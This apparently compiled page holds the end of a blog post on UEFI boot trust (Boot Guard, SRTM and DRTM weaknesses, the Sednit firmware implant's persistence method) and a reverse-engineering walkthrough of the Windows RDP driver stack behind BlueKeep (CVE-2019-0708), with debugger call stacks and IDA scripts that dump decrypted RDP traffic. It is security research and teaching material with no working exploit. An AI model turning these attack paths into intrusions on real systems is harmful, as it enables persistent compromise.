I'd encourage all Windows 10 users to enable 'Core Isolation' (available in the system Settings). This enables HVCI (Hypervisor-protected Code Integrity) on the system, in turn meaning that the Microsoft Hyper-V hypervisor platform will run, such that the VBS (Virtualization-based Security) features enabled by VSM (Virtual Secure Mode) will be available. In this scenario winload is responsible for bringing up the hypervisor, securekernel, etc., but diving into that requires a separate post (and others have done justice to it anyway).

RT

The kernel will now perform its own initialization and set things up just right - loading drivers etc. - taking us to the stage most people identify as the 'end of boot'. The only EFI services still available to the OS are the EFI Runtime Services, which the OS will invoke as necessary (e.g. when reading/writing UEFI variables, at shutdown, etc.). This part of the UEFI life-cycle is termed the RT (RunTime).

SRTM/DRTM and rambling thoughts

We should now have a rudimentary understanding of the general boot flow. I do want to back up a bit though, and again discuss the verified boot flow and where the pitfalls can lie. Hopefully one can see how relatively complex this all is; ensuring that players get everything correct is often a challenge. Everything that we've discussed until now is part of what we term the SRTM (Static Root-of-Trust for Measurement) flow. This basically means that, from the OS's perspective, all parts of the flow up until it, itself, boots form part of the TCB (Trusted Computing Base).

Let's dissect this for a moment. The initial trust is rooted in the CPU + chipset vendor. In Intel's case, we have the CPU ROM and the CSME ROM as joint roots-of-trust. OK, Intel, AMD et al. are pretty well versed in security stuff after all - perhaps we're happy to trust they have done their jobs here (history says not, but it is getting better with time and hey, we've got to trust someone).
But once the ACM verifies the IBB, we have moved responsibility to OEM vendor code. Now, I'll be charitable here and say that often this code is godawful from a security perspective. There is a significant amount of code (just count the PEIMs and DXE drivers) sourced from all over the place, and often these folk simply don't have the security expertise to implement things properly. The OEM-owned IBB measures the OEM-owned OBB, which measures the OS bootloader. We might trust the OS vendor to also do good work here (again, not foolproof), but we have this black hole of potential security pitfalls for OEM vendors to collapse into. And if UEFI is compromised, it doesn't matter how good the OS bootloader verification flows are. Basically, this thing is only as good as its weakest link; and that, traditionally, has been UEFI.

Let's identify some SRTM pitfalls. Starting with the obvious: if the CPU ROM or CSME/PSP ROMs are compromised, everything falls apart (the same is of course true with DRTM, described below). I wish I could say that there aren't issues here with specific vendors, but that would be disingenuous. Let us assume for now that the CPU folk have gotten their act together.

We now land ourselves in the IBB, or some segment verified by the ACM/PSP. The first pitfall is that the OEM vendor needs to actually present the correct parts of the firmware for verification by the ACM. Sometimes modules are left out and are just happily executed by the PEI (as they've also short-circuited PEIM verification). Worse, the ACM requires an OEM key to verify the IBB (hence why it needs the CSME in the first place) - some OEMs haven't burned in their key properly, or are using test keys, or haven't set the EOM (End of Manufacturing) fuse, allowing carte blanche attacks against this (and even worse, lack of OEM action here can actually lead to these security features being hijacked to protect malicious code itself).
OEMs need to be wary about making sure that when PEI switches over to main system memory, a TOCTOU attack isn't opened up by re-reading modules off SPI and assuming they are trusted. Furthermore, for verified boot to work, there needs to be some PEI module responsible for verifying DXE; but if the OEM has stuffed up and the IBB isn't verified properly at all, then this module can be tampered with and the flow falls apart. Oh, and this OEM code could do the whole verification bit correctly and simply do an 'I'll just execute this code-that-failed-verification and ask it to reset the platform, because I'll tell it that it, itself, failed verification' (oh yes, this happened). And there are all those complex flows that I haven't spoken about at all - e.g. resuming from sleep states and needing to protect the integrity of saved contexts correctly.

Also, just enabling the disparate security features seems beyond some OEMs - even basic ones like 'don't allow arbitrary runtime writes to the flash' are ignored. Getting this correct requires deep knowledge of the space. For example, vendors have traditionally not considered the evil maid attack in scope, and TOCTOU attacks have been demonstrated against the verification of both the IBB and OBB.

Carrying on though, let's assume that PEI is implemented correctly; what about the DXE module responsible for things down the line? Has that been done correctly? Secure Boot has its own complexities, what with its key management and only allowing modification of authenticated UEFI variables by PK owners, etc. I'm not going to go into every aspect of what can go wrong here, but honestly we've seen quite a lot of demonstrable issues historically.

(To be clear, above I'm speaking about SRTM in terms of what usually goes on in most Windows-based machines today. There are SRTM schemes that do a lot better - e.g.
Google's Titan and Microsoft's Cerberus, in which a separate component is interposed between the host/chipset processors and the firmware residing on SPI.)

So folk got together and made an attempt to come up with a way to take the UEFI bits out of the TCB. Of course this code still needs to run, but we don't really want to trust it for the purposes of verifying and loading the operating system. So DRTM (Dynamic Root-of-Trust for Measurement) was invented. In essence, this is a way to supply potentially multiple pieces of post-UEFI code for verification by the folk that we trust more than the folk we trust less - i.e. the CPU/chipset vendors (Intel/AMD et al.). Instead of just relying on the Secure Boot flow - which relies on the OEMs having implemented it properly - we just don't care what UEFI does (it's assumed compromised in the model). Just prior to executing the OS, we execute another ACM via the special SENTER/SKINIT instructions (rooted in the CPU Root-of-Trust, just like we had with Boot Guard verifying the IBB). This time we ask this ACM to measure a piece of OS-vendor (or other vendor) code called an MLE (Measured Launch Environment) - all measurements extended into PCRs of the TPM, of course, such that we can attest to them later on. This MLE - after verification by the ACM - is now trusted and can measure the various OS components etc., bypassing trust in EFI.

Now here's my concern: I've heard folk get really excited about DRTM - and rightly so; it's a step forward in terms of security. However, I'd like to speak about some potential issues with the 'DRTM solves all' approach. My main concern is that we stop understanding that compromised UEFI can still possibly be damaging to practical security - even in a DRTM-enabled world. SMM is still an area of concern (although there are incoming architectural features that will help address this).
But even disregarding SMM, the general-purpose operating systems that most of the world's clients + servers run on were designed in an era before our security field matured. Security has been tacked on for years with increasing complexity. In a practical sense, even our user modes still execute code that is privileged in the sense of being able to effect the exact damage on a targeted system that attackers are happy to live with (not to forget that our kernel modes are pretty permissive as well). Remember, attackers don't care about security boundaries or domains of trust; they just want to do what they need to do.

As an example, in recent history an actor known as Sednit/Strontium achieved a high degree of persistence on machines by installing DXE implants on platforms that hadn't correctly secured programmatic write access to the SPI flash. Enabling Secure Boot is ineffectual here, as it only cares about post-DXE; compromised DXE means compromised Secure Boot. Enabling Measured/Verified Boot could *possibly* have helped in this particular case - if we trust the current UEFI code to do its job - but confidence in that probably isn't high, given that these platform folk didn't even disable write access to the SPI (and we've seen Boot Guard rendered ineffectual via DXE manipulation - something Sednit would have been able to do here). So let us assume that Sednit would have been able to get their DXE modules running even under Verified Boot.

Anyway, the firmware implants attacked the system by mounting the primary NTFS partition, writing their malicious code to the drive, messing around with the SYSTEM registry hive to ensure that their service is loaded at early boot and... done! That's all that's necessary to compromise a system such that it can persist over an FnR (Format and Restore).
(BitLocker can also help defend against this particular type of attack in an SRTM flow; but that's assuming it's enabled in the first place - and that the CRTM is doing its job - and that it's not configured in an auto-unlock mode.)

Let's take this scenario into a DRTM world. UEFI 'Secure Boot' compromise becomes somewhat irrelevant with DRTM - the MLE can do the OS verification flow, so that's great. An attacker can no longer unmeasurably modify the OS boot manager, boot loader, kernel (code regions, at least), securekernel or hv with impunity. These are all very good things. But here's the thing: UEFI is untrusted in the DRTM model, so in the threat model we assume that the attacker would be able to run their DXE code - like today. They can do that very same NTFS write to get their user-mode service onto the NTFS volume. Under a default Windows setup - sans a special application control / Device Guard policy - Windows will happily execute that attacker service (code-signing is completely ineffectual here; that's a totally broken model for Windows user-mode applications).

Honestly though, a machine that enabled a DRTM flow would hopefully enable BitLocker, which should be more effectual here, as I'd expect that the DRTM measurements are required before unsealing the BitLocker decryption key (I'm not exactly sure of the implementation details around this). But I wonder to what extent compromised UEFI could mess around with this flow; perhaps by extending the PCRs itself with the values expected from DRTM measurements, unsealing the key, writing its stuff to the drive, then rebooting? Or, more complexly, launching its own hypervisor to execute the rest of the Windows boot flow under (perhaps trapping SENTER/SKINIT et al.?). I'd need to give some thought as to what's possible here, but given the complexity surrounding all this, it's not out of the realm of possibility that compromised UEFI can still be damaging.
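The PCR-extend semantics underlying the unsealing speculation above are worth making concrete: a PCR is never written directly, only extended - new = H(old || measurement) - so a given final value commits to the entire ordered sequence of measurements. A toy model, with 64-bit FNV-1a as an explicit stand-in for the TPM's real SHA-1/SHA-256 banks (only the chaining structure matters here):

```c
#include <stdint.h>
#include <string.h>

/* Toy stand-in for a cryptographic hash (FNV-1a, 64-bit). A real TPM
 * uses SHA-1/SHA-256; we only care about the chaining structure. */
static uint64_t toy_hash(const void *data, size_t len)
{
    const unsigned char *p = data;
    uint64_t h = 0xcbf29ce484222325ULL;
    for (size_t i = 0; i < len; i++) {
        h ^= p[i];
        h *= 0x100000001b3ULL;
    }
    return h;
}

/* PCR extend: new = H(old || measurement). There is no "set"
 * operation, so reaching a given final value requires replaying the
 * exact ordered sequence of measurements. */
static uint64_t pcr_extend(uint64_t pcr, uint64_t measurement)
{
    unsigned char buf[16];
    memcpy(buf, &pcr, 8);
    memcpy(buf + 8, &measurement, 8);
    return toy_hash(buf, sizeof(buf));
}
```

With a real hash, an attacker who wants a PCR to hold the 'expected' value must feed in the exact same measurements in the exact same order, which is why the replay idea floated above would need the attacker to know those expected measurement values in advance.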
Now, honestly, in terms of something Sednit-like writing an executable to disk: a more restrictive (e.g. state-separated) platform that is discerning about what user- and kernel-mode code it lets run (and with which privileges) might benefit significantly from DRTM - although it seems likely one can effect huge damage on an endpoint via corrupting settings files alone, no code exec required; something like how we view data corruption via DKOM, except this time 'DCM' (Direct Configuration Manipulation)? from firmware.

DRTM is *excellent*; I'm just cautioning against assuming that it's an automatic 'fix-all' today for platform security issues. I feel more industry research around this may be needed to empirically verify the bounds of its merits.

I hope you enjoyed this 'possibly-a-little-more-than-a-primer' view into UEFI boot and some of the trust model that surrounds it. Some hugely important, related things I haven't spoken about include SMM, OROMs and secure firmware updates (e.g. Intel BIOS Guard); topics for another time. Please let me know if you found this useful at all (it did take a non-insignificant amount of time to write). I'm always happy to receive constructive feedback too.

I'd like to end off with a few links to some offensive research work done by some fantastic folk that I've come across over the years - showing what can be done to compromise this flow (some of which I've briefly mentioned above).
If you know of any more resources, please send them my way and I'll happily extend this list:

https://conference.hitb.org/hitbsecconf2019ams/materials/D1T1 - Toctou Attacks Against Secure Boot - Trammell Hudson & Peter Bosch.pdf
https://github.com/rrbranco/BlackHat2017/blob/master/BlackHat2017-BlackBIOS-v0.13-Published.pdf
https://medium.com/@matrosov/bypass-intel-boot-guard-cc05edfca3a9
https://embedi.org/blog/bypassing-intel-boot-guard/
https://www.blackhat.com/docs/us-17/wednesday/us-17-Matrosov-Betraying-The-BIOS-Where-The-Guardians-Of-The-BIOS-Are-Failing.pdf
https://2016.zeronights.ru/wp-content/uploads/2017/03/Intel-BootGuard.pdf

Source: https://depletionmode.com/uefi-boot.html
  11. Low-level Reversing of BLUEKEEP vulnerability (CVE-2019-0708)

06 Aug 2019
BY: Latest from CoreLabs

This work was originally done on Windows 7 Ultimate SP1 64-bit. The versions of the libraries used in the tutorial are:

termdd.sys version 6.1.7601.17514
rdpwsx.dll version 6.1.7601.17828
rdpwd.sys version 6.1.7601.17830
icaapi.dll version 6.1.7600.16385
rdpcorekmts.dll version 6.1.7601.17828

The svchost.exe process

In the Windows NT operating system family, svchost.exe ('Service Host') is a system process that serves or hosts multiple Windows services. It runs in multiple instances, each hosting one or more services. It's indispensable in the execution of so-called shared service processes, where a grouping of services can share processes in order to reduce the use of system resources. The tasklist /svc command on a console with administrator permissions shows us the different svchost processes and their associated services.

Image 1.png

Also, in Process Explorer you can easily identify which of the svchost instances is the one that handles RDP connections (Remote Desktop Services).

image2019-7-1_8-54-22.png

STEP 1) Initial reversing to find the point where the program starts to parse my decrypted data

The first thing we'll do is try to see where the driver is called from. For that, once we're debugging the remote kernel with WinDbg or IDA, we put a breakpoint in the driver dispatch, i.e. in the IcaDispatch function of termdd.sys.

image2019-7-1_9-1-57.png

In the WinDbg command bar I type:

.reload /f
!process 1 0

PROCESS fffffa8006598b30
    SessionId: 0  Cid: 0594  Peb: 7fffffd7000  ParentCid: 01d4
    DirBase: 108706000  ObjectTable: fffff8a000f119a0  HandleCount: 662.
    Image: svchost.exe

The call stack is:

WINDBG>k
Child-SP          RetAddr           Call Site
fffff880`05c14728 fffff800`02b95b35 termdd!IcaDispatch
fffff880`05c14730 fffff800`02b923d8 nt!IopParseDevice+0x5a5
fffff880`05c148c0 fffff800`02b935f6 nt!ObpLookupObjectName+0x588
fffff880`05c149b0 fffff800`02b94efc nt!ObOpenObjectByName+0x306
fffff880`05c14a80 fffff800`02b9fb54 nt!IopCreateFile+0x2bc
fffff880`05c14b20 fffff800`0289b253 nt!NtCreateFile+0x78
fffff880`05c14bb0 00000000`7781186a nt!KiSystemServiceCopyEnd+0x13
00000000`06d0f6c8 000007fe`f95014b2 ntdll!NtCreateFile+0xa
00000000`06d0f6d0 000007fe`f95013f3 ICAAPI!IcaOpen+0xa6
00000000`06d0f790 000007fe`f7dbd2b6 ICAAPI!IcaOpen+0x13
00000000`06d0f7c0 000007fe`f7dc04bd rdpcorekmts!CKMRDPConnection::InitializeInstance+0x1da
00000000`06d0f830 000007fe`f7dbb58a rdpcorekmts!CKMRDPConnection::Listen+0xf9
00000000`06d0f8d0 000007fe`f7dba8ea rdpcorekmts!CKMRDPListener::ListenThreadWorker+0xae
00000000`06d0f910 00000000`7755652d rdpcorekmts!CKMRDPListener::staticListenThread+0x12
00000000`06d0f940 00000000`777ec521 kernel32!BaseThreadInitThunk+0xd
00000000`06d0f970 00000000`00000000 ntdll!RtlUserThreadStart+0x1d

An instance of the CKMRDPListener class is created, and a thread is created whose start address is the method CKMRDPListener::staticListenThread.

image2019-7-1_10-17-43.png

The execution continues here:

image2019-7-1_10-20-52.png

here:

image2019-7-1_10-22-19.png

and here:

image2019-7-1_10-23-22.png

IcaOpen is called:

image2019-7-1_10-24-34.png
image2019-7-1_14-18-49.png

We can see that RDX (buffer) and R8D (size of buffer) are both equal to zero in this first call to IcaOpen. Next, the termdd driver is opened using the call to NtCreateFile.

image2019-7-1_9-12-46.png

We arrive at IcaDispatch when opening the driver.
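We land in IcaDispatch because NtCreateFile generates an IRP whose major function code is IRP_MJ_CREATE (0), and a WDM driver's dispatch routine routes on that code. A minimal user-mode model of the pattern (the IRP_MJ_* values are the real WDK constants; the handler names are hypothetical stand-ins for IcaCreate and friends, and this is an illustration, not the real termdd code):

```c
#include <stddef.h>

/* WDM major function codes (values from the WDK headers). */
#define IRP_MJ_CREATE           0x00
#define IRP_MJ_CLOSE            0x02
#define IRP_MJ_DEVICE_CONTROL   0x0e
#define IRP_MJ_MAXIMUM_FUNCTION 0x1b

/* Each stand-in handler just reports which one ran. */
enum handler { H_UNSUPPORTED, H_CREATE, H_CLOSE, H_IOCTL };

static enum handler on_create(void) { return H_CREATE; }
static enum handler on_close(void)  { return H_CLOSE;  }
static enum handler on_ioctl(void)  { return H_IOCTL;  }

typedef enum handler (*dispatch_fn)(void);

/* Model of a dispatch routine: route on the IRP's MajorFunction
 * field, as IcaDispatch does when it selects IcaCreate for code 0. */
static enum handler dispatch(unsigned major)
{
    static const dispatch_fn table[IRP_MJ_MAXIMUM_FUNCTION + 1] = {
        [IRP_MJ_CREATE]         = on_create,
        [IRP_MJ_CLOSE]          = on_close,
        [IRP_MJ_DEVICE_CONTROL] = on_ioctl,
    };
    if (major > IRP_MJ_MAXIMUM_FUNCTION || table[major] == NULL)
        return H_UNSUPPORTED;
    return table[major]();
}
```

This is why the breakpoint on IcaDispatch fires on a plain file open: the open itself is an IRP with MajorFunction 0, before any RDP data is ever sent.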
image2019-7-1_10-30-44.png Reversing we can see image2019-7-1_10-49-54.png image2019-7-1_11-37-10.png The MajorFunction value is read here image2019-7-1_11-40-31.png image2019-7-1_11-41-16.png As MajorFuncion equals 0 it takes us to IcaCreate image2019-7-1_11-43-26.png image2019-7-1_11-45-17.png Inside IcaCreate, SystemBuffer is equal to 0 image2019-7-1_12-51-8.png image2019-7-1_12-49-25.png image2019-7-1_12-52-42.png A chunk of size 0x298 and tag ciST is created, and I call it chunk_CONNECTION. image2019-7-1_13-10-53.png chunk_CONNECTION is stored in FILE_OBJECT.FsContext image2019-7-1_13-14-27.png I rename FsContext to FsContext_chunk_CONNECTION. image2019-7-1_13-16-44.png IcaDispatch is called for second time Child-SP RetAddr Call Site fffff880`05c146a0 fffff880`03c96748 termdd!IcaCreate+0x36 fffff880`05c146f0 fffff800`02b95b35 termdd!IcaDispatch+0x2d4 fffff880`05c14730 fffff800`02b923d8 nt!IopParseDevice+0x5a5 fffff880`05c148c0 fffff800`02b935f6 nt!ObpLookupObjectName+0x588 fffff880`05c149b0 fffff800`02b94efc nt!ObOpenObjectByName+0x306 fffff880`05c14a80 fffff800`02b9fb54 nt!IopCreateFile+0x2bc fffff880`05c14b20 fffff800`0289b253 nt!NtCreateFile+0x78 fffff880`05c14bb0 00000000`7781186a nt!KiSystemServiceCopyEnd+0x13 00000000`06d0f618 000007fe`f95014b2 ntdll!NtCreateFile+0xa 00000000`06d0f620 000007fe`f95018c9 ICAAPI!IcaOpen+0xa6 00000000`06d0f6e0 000007fe`f95017e8 ICAAPI!IcaStackOpen+0xa4 00000000`06d0f710 000007fe`f7dbc015 ICAAPI!IcaStackOpen+0x83 00000000`06d0f760 000007fe`f7dbd2f9 rdpcorekmts!CStack::CStack+0x189 00000000`06d0f7c0 000007fe`f7dc04bd rdpcorekmts!CKMRDPConnection::InitializeInstance+0x21d 00000000`06d0f830 000007fe`f7dbb58a rdpcorekmts!CKMRDPConnection::Listen+0xf9 00000000`06d0f8d0 000007fe`f7dba8ea rdpcorekmts!CKMRDPListener::ListenThreadWorker+0xae 00000000`06d0f910 00000000`7755652d rdpcorekmts!CKMRDPListener::staticListenThread+0x12 00000000`06d0f940 00000000`777ec521 kernel32!BaseThreadInitThunk+0xd 00000000`06d0f970 00000000`00000000 
ntdll!RtlUserThreadStart+0x1d

We saw that the previous call to the driver was generated here
image2019-7-1_13-36-4.png
When that call ends, an instance of the CStack class is created
image2019-7-1_13-37-32.png
and the class constructor is called.
image2019-7-1_13-38-2.png
This matches the current call stack:

fffff880`05c146a0 fffff880`03c96748 termdd!IcaCreate+0x36
fffff880`05c146f0 fffff800`02b95b35 termdd!IcaDispatch+0x2d4
fffff880`05c14730 fffff800`02b923d8 nt!IopParseDevice+0x5a5
fffff880`05c148c0 fffff800`02b935f6 nt!ObpLookupObjectName+0x588
fffff880`05c149b0 fffff800`02b94efc nt!ObOpenObjectByName+0x306
fffff880`05c14a80 fffff800`02b9fb54 nt!IopCreateFile+0x2bc
fffff880`05c14b20 fffff800`0289b253 nt!NtCreateFile+0x78
fffff880`05c14bb0 00000000`7781186a nt!KiSystemServiceCopyEnd+0x13
00000000`06d0f618 000007fe`f95014b2 ntdll!NtCreateFile+0xa
00000000`06d0f620 000007fe`f95018c9 ICAAPI!IcaOpen+0xa6
00000000`06d0f6e0 000007fe`f95017e8 ICAAPI!IcaStackOpen+0xa4
00000000`06d0f710 000007fe`f7dbc015 ICAAPI!IcaStackOpen+0x83
00000000`06d0f760 000007fe`f7dbd2f9 rdpcorekmts!CStack::CStack+0x189
00000000`06d0f7c0 000007fe`f7dc04bd rdpcorekmts!CKMRDPConnection::InitializeInstance+0x21d
00000000`06d0f830 000007fe`f7dbb58a rdpcorekmts!CKMRDPConnection::Listen+0xf9
00000000`06d0f8d0 000007fe`f7dba8ea rdpcorekmts!CKMRDPListener::ListenThreadWorker+0xae
00000000`06d0f910 00000000`7755652d rdpcorekmts!CKMRDPListener::staticListenThread+0x12
00000000`06d0f940 00000000`777ec521 kernel32!BaseThreadInitThunk+0xd
00000000`06d0f970 00000000`00000000 ntdll!RtlUserThreadStart+0x1d

The highlighted text is the same for both calls; the differences are the red line and the frames above it. The first call returns to

00000000`06d0f7c0 000007fe`f7dc04bd rdpcorekmts!CKMRDPConnection::InitializeInstance+0x1da

image2019-7-1_13-41-16.png
The second call returns to

00000000`06d0f7c0 000007fe`f7dc04bd rdpcorekmts!CKMRDPConnection::InitializeInstance+0x21d

image2019-7-1_13-42-34.png
And this second call continues to
image2019-7-1_13-43-46.png
Next
image2019-7-1_13-45-3.png
Next
image2019-7-1_14-20-48.png
We arrive at _IcaOpen, calling NtCreateFile for the second time, but now Buffer is a user-mode chunk with a nonzero size, 0x36.
image2019-7-1_13-46-58.png
This second call reaches IcaDispatch and IcaCreate in a similar way to the first call, but now SystemBuffer is nonzero. I suppose that SystemBuffer is created whenever the buffer size is nonzero (in the first call buffer = 0 → SystemBuffer = 0; now buffer != 0 → SystemBuffer != 0). SystemBuffer is stored in _IRP.AssociatedIrp.SystemBuffer here
image2019-7-2_6-33-41.png
in the decompiled code
image2019-7-2_6-49-1.png
Previously the IRP is moved to r12
image2019-7-2_6-34-34.png
=
image2019-7-1_13-50-29.png
That address is accessed many times, so the only way to stop when it is nonzero is to use a conditional breakpoint.
image2019-7-2_7-50-54.png
image2019-7-2_8-36-51.png
The first time RAX is nonzero, it stops before the second call to CREATE, and if I continue executing, I reach IcaCreate with the new value of SystemBuffer.
image2019-7-2_7-57-25.png
We arrive at this code; the variable named "contador" (Spanish for "counter") is zero, and for this reason we land in IcaCreateStack.
image2019-7-2_8-18-25.png
In IcaCreateStack a new chunk of size 0xBA8 is allocated; I call it chunk_stack_0xBA8.
image2019-7-2_8-21-24.png
I comment out the stopping part of the conditional breakpoint, so it only keeps logging.
image2019-7-2_8-44-4.png
I repeat the process to get a fresh log.
image2019-7-2_8-43-25.png
Summarizing: just by executing these two lines of code to create a connection, and even without sending any data, we already have access to the driver. The most relevant part of the log when connecting is this:
image2019-7-5_7-41-1.png
IcaCreate was called twice, with MajorFunction = 0x0. The first call allocates chunk_CONNECTION; the second call allocates chunk_stack_0xBA8.
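Those "two lines of code" amount to nothing more than a TCP connect to the RDP port. A minimal Python sketch (host and port are illustrative, and no RDP data is sent):

```python
import socket

def connect_only(host, port=3389, timeout=5):
    """Open a TCP connection and close it without sending a byte.
    Per the log above, even this is enough to drive termdd.sys
    through two IcaCreate calls on the server side."""
    s = socket.create_connection((host, port), timeout=timeout)
    s.close()
```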
We will now begin to reverse the data the server receives. For this it would be convenient to use Wireshark to analyze the data, but since the connection is encrypted with SSL, Wireshark would only show us the encrypted bytes, which does not help much.
image2019-7-10_7-17-40.png
The data travels encrypted and that is how Wireshark receives it, but we will use it all the same. For this purpose we need to find the point where the program begins to parse the already-decrypted data.
image2019-7-10_7-21-1.png
The driver rdpwd.sys is in charge of parsing the decrypted data. The important point for us is in the function MCSIcaRawInputWorker, where the program starts to parse the decrypted bytes.
image2019-7-10_7-23-32.png

STEP 2) Place conditional breakpoints in IDA Pro to dump the decrypted data to a file

The idea is to place a conditional breakpoint at that point, so that each time execution passes there it saves the already-decrypted data to a file; we can then load that file into Wireshark.
image2019-7-10_7-40-29.png
This analyzes the module rdpwd.sys so I can find its functions in IDA while debugging from my termdd.sys database, whenever it stops at a breakpoint in this driver.
image2019-7-10_7-44-21.png
image2019-7-10_7-44-42.png
I have found the important point. If the module rdpwd.sys changes its base address because of ASLR, I will have to repeat these steps to relocate the breakpoint correctly.

address = 0xFFFFF880034675E8
filename = r"C:\Users\ricardo\Desktop\pepe.txt"
size = 0x40
out = open(filename, "wb")
dbgr = True
data = GetManyBytes(address, size, use_dbg=dbgr)
out.write(data)
out.close()

This script saves to a file the bytes pointed to by the variable "address"; the amount saved is given by the variable "size". It writes the file to my desktop. I will adapt it to read the address and size from the registers at the breakpoint.
address = cpu.r12
size = cpu.rbp
filename = r"C:\Users\ricardo\Desktop\pepe.txt"
out = open(filename, "ab")
dbgr = True
data = GetManyBytes(address, size, use_dbg=dbgr)
out.write(data)
out.close()

image2019-7-10_8-21-26.png
This dumps the bytes to the file perfectly.
image2019-7-10_8-16-31.png
I will use this script in the conditional breakpoint.
image2019-7-10_8-25-48.png
This script makes a raw dump, but Wireshark's import only understands a hex-dump text format.
image2019-7-10_8-52-4.png

address = cpu.r12
size = cpu.rbp
filename = r"C:\Users\ricardo\Desktop\pepe.txt"
out = open(filename, "ab")
dbgr = True
data = GetManyBytes(address, size, use_dbg=dbgr)
hexstr = ""
for i in data:
    hexstr += "%02x " % ord(i)
out.write(hexstr)
out.close()

In the Windows 7 32-bit version, this is the important point where the decrypted data is parsed, and we can use this script to dump it to a file.
image2019-7-25_7-4-49.png

Windows 7 32-bit script:

address = cpu.eax
size = cpu.ebx
filename = r"C:\Users\ricardo\Desktop\pepefff.txt"
out = open(filename, "ab")
dbgr = True
data = GetManyBytes(address, size, use_dbg=dbgr)
hexstr = ""
for i in data:
    hexstr += "%02x " % ord(i)
out.write(hexstr)
out.close()

Windows XP 32-bit script:

address = cpu.eax
size = cpu.edi
filename = r"C:\Users\ricardo\Desktop\pepefff.txt"
out = open(filename, "ab")
dbgr = True
data = GetManyBytes(address, size, use_dbg=dbgr)
hexstr = ""
for i in data:
    hexstr += "%02x " % ord(i)
out.write(hexstr)
out.close()

This is the equivalent point in Windows XP.
image2019-7-29_9-7-42.png
image2019-7-29_9-9-50.png

STEP 3) Importing into Wireshark

This script saves the bytes in a format that Wireshark understands. When I use "Import from Hex Dump", I set the port "3389/tcp" : "msrdp".
image2019-7-10_9-39-29.png
We load our dump file and set the destination port to 3389; the source port is not important. I add a rule to decode port 3389 as TPKT.
image2019-7-10_10-5-44.png
image2019-7-10_9-43-3.png
That file will be decoded as TPKT in Wireshark. That's the complete script.
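The conversion these breakpoint scripts perform can be reproduced offline. Here is a standalone Python 3 sketch (the function name is mine) that turns a raw dump into offset-prefixed hex text of the kind Wireshark's "Import from Hex Dump" dialog accepts:

```python
def to_hex_dump(data, width=16):
    """Format raw bytes as an offset-prefixed hex dump, one line
    per `width` bytes, suitable for Wireshark's hex-dump import."""
    lines = []
    for off in range(0, len(data), width):
        chunk = data[off:off + width]
        hexpart = " ".join("%02x" % b for b in chunk)
        lines.append("%06x  %s" % (off, hexpart))
    return "\n".join(lines) + "\n"
```

For example, to_hex_dump(b"\x03\x00\x00\x13") yields the single line "000000  03 00 00 13".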
image2019-7-10_10-30-53.png
Using that script, the dump file is created; when it is imported as a hex dump in Wireshark, it is displayed perfectly.
image2019-8-7_13-3-46.png
This could also be done by importing the SSL private key into Wireshark, but I like to do it the most manual, old-school way.

STEP 4) More reversing

We are ready to receive and analyze our first packet, but first we must analyze a few more tasks that the program performs between what we saw so far and the reception of the first packet of our data. We can see that there are a few more calls to the driver before it starts to receive data.
image2019-7-11_7-40-17.png
The part marked in red is what is left to analyze from the first connection, still without sending data. I will modify the conditional breakpoint to stop at the first MajorFunction = 0xE.
image2019-7-11_7-50-23.png
It will stop when MajorFunction = 0xE.
image2019-7-11_7-54-22.png
We arrive at IcaDeviceControl.
image2019-7-11_7-55-47.png
We can see that this call is generated when the program accepts the connection, calling ZwDeviceIoControlFile next.
image2019-7-11_8-16-31.png
We can see that the IRP and IO_STACK_LOCATION keep the same values, while the file object has changed.
image2019-7-11_8-34-49.png
We will keep the structure named FILE_OBJECT for the previous call, and make a copy with the original fields, named FILE_OBJECT_2, to be used in this call.
image2019-7-11_8-40-35.png
The previous FILE_OBJECT was an object obtained from ObReferenceObjectByHandle.
image2019-7-11_8-51-20.png
The new FILE_OBJECT has the same structure but is a different object; for that reason we create a new structure for it.
image2019-7-11_11-16-45.png
We continue reversing ProbeAndCaptureUserBuffers.
image2019-7-11_11-50-29.png
A new chunk of size (InputBufferLength + OutputBufferLength) is allocated.
image2019-7-11_11-47-15.png
It stores the pointers to the input and output buffer chunks.
image2019-7-11_11-51-8.png
We can see that IcaUserProbeAddress is similar to the nt!MmUserProbeAddress value.
image2019-7-12_6-36-39.png
It is used to verify whether a user-specified address resides within user-mode memory. If the address is lower than IcaUserProbeAddress, it resides in user-mode memory, and a second check ensures that the address InputUserBuffer + InputBufferLength is greater than InputUserBuffer (i.e., the size is not negative).
image2019-7-12_7-9-41.png
Then the data is copied from InputUserBuffer to the chunk_Input_Buffer that was just allocated for this purpose. We can see the data the program copies from InputUserBuffer; it is not data that we sent yet.
image2019-7-12_7-11-34.png
Since OutputBufferLength is zero, it will not copy from OutputUserBuffer to chunk_OutputBuffer.
image2019-7-12_7-13-47.png
It clears chunk_OutputBuffer and returns.
image2019-7-12_7-17-41.png
Returning from ProbeAndCaptureUserBuffers, we can see that this function copies the user-mode input and output buffers into the newly allocated kernel-memory chunks, so the driver can handle that data.
image2019-7-12_7-21-55.png
The variable "resource" points to IcaStackDispatchTable.
image2019-7-12_7-37-14.png
I frame the area of the table and create a structure from memory, which I call _IcaStackDispatchTable.
image2019-7-12_7-45-56.png
image2019-7-12_7-43-49.png
I entered and started to reverse this function.
image2019-7-12_8-28-20.png
The first time we arrive here, the IOCTL value is 0x38002b.
image2019-7-12_8-44-11.png
We arrive at a call to _IcaPushStack.
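The two-part check described above can be modeled with a small Python sketch. The constant and names are illustrative, not the driver's actual code; the point is the shape of the validation: below the probe limit, and no wraparound.

```python
# Illustrative model of the user-buffer validation described above.
# 0x7FFF0000 stands in for the IcaUserProbeAddress / MmUserProbeAddress
# limit on 32-bit Windows; the real value comes from the kernel.
USER_PROBE_ADDRESS = 0x7FFF0000

def probe_user_buffer(buf, length):
    """Return True if the buffer passes both checks: it starts below
    the probe limit, and buf + length does not wrap around 32 bits
    (i.e., the size is not effectively negative)."""
    if buf >= USER_PROBE_ADDRESS:
        return False              # address is in kernel space
    end = (buf + length) & 0xFFFFFFFF
    return end >= buf             # a wraparound would make end < buf
```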
image2019-7-12_9-10-25.png
Inside, two allocations are performed; I named them chunk_PUSH_STACK_0x488 and chunk_PUSH_STACK_0xA8.
image2019-7-12_11-43-51.png
When IOCTL value 0x38002b is used, we reach _IcaLoadSd.
image2019-7-12_11-57-33.png
We can see the complete log of the calls to the driver with the different IOCTLs, still for a connection that has not sent any data yet:

IO_STACK_LOCATION 0xfffffa80061bea90L
IRP 0xfffffa80061be9c0L
chunk_CONNECTION 0xfffffa8006223510L
IO_STACK_LOCATION 0xfffffa80061bea90L
IRP 0xfffffa80061be9c0L
FILE_OBJECT 0xfffffa8004231860L
chunk_stack_0xBA8 0xfffffa80068d63d0L
FILE_OBJECT_2 0xfffffa80063307b0L
IOCTL 0x380047L
FILE_OBJECT_2 0xfffffa8006335ae0L
